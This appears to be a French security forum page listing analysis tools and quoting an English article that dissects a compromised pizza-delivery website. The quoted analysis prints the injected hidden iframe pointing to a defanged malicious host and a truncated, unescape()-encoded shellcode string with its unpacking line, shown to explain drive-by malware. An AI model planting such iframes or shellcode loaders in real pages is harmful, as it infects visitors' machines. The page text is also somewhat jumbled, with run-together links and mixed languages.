
OfficeCat is a command line utility that can be used to process Microsoft Office Documents for the presence of potential exploit conditions in the file.
The tool is used on Windows systems and is provided as a binary executable.
http://www.snort.org/vrt/vrt-resources/officecatThe Sysinternals Troubleshooting Utilities have been rolled up into a single Suite of tools. This file contains the individual troubleshooting tools and help files. It does not contain non-troubleshooting tools like the BSOD Screen Saver or NotMyFault.
http://technet.microsoft.com/en-us/sysinternals/bb842062.aspxhttp://nologin.org/Downloads/Papers/win32-shellcode.pdf
Jill a écrit:Article génial :p !!
J'ai suivi un lien à la fin de l'article sur une exploit d'ActiveX qui mène au téléchargement d'une malware uniquement en visitant une page web (ici son livreur de pizza qui s'est fait hack XD ), voici le lien
http://www.h-online.com/security/features/CSI-Internet-Alarm-at-the-pizza-service-1019940.html
After I've replaced document.write() with a simple print(), however, the code works fine:
$ js 1.js
<iframe src="hxxp://tissot333.cn/eleonore/index.php"
width="0" height="0" frameborder="0">
</iframe>
Looks like somebody injected an iFrame with a reference to another web page into the website of my favourite pizza service. They probably exploited a vulnerability in the web software used and added the code via a method such as SQL injection.
var z4wurLU =
"%uA164%u0018%u0000%u408B%u8B30
[ ... ]
%u6944%u6572%u7463%u5F58%u5344";
And this time, the whole thing is unpacked via unescape():
var ZqEs8Ui = unescape(z4wurLU);
However, these encoded hex values look more like shellcode to me – machine-code instructions that are to be injected via a security hole and then executed. The next line confirms this:
#b00010101#xFFA025CB#o76423071#u0279AB51
Toutefois, je reste plus que mitigé quant au fait que cette injection de code permanent sur la page du site de pizzas ait été fait par le biais d'une SQLi
Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 1 invité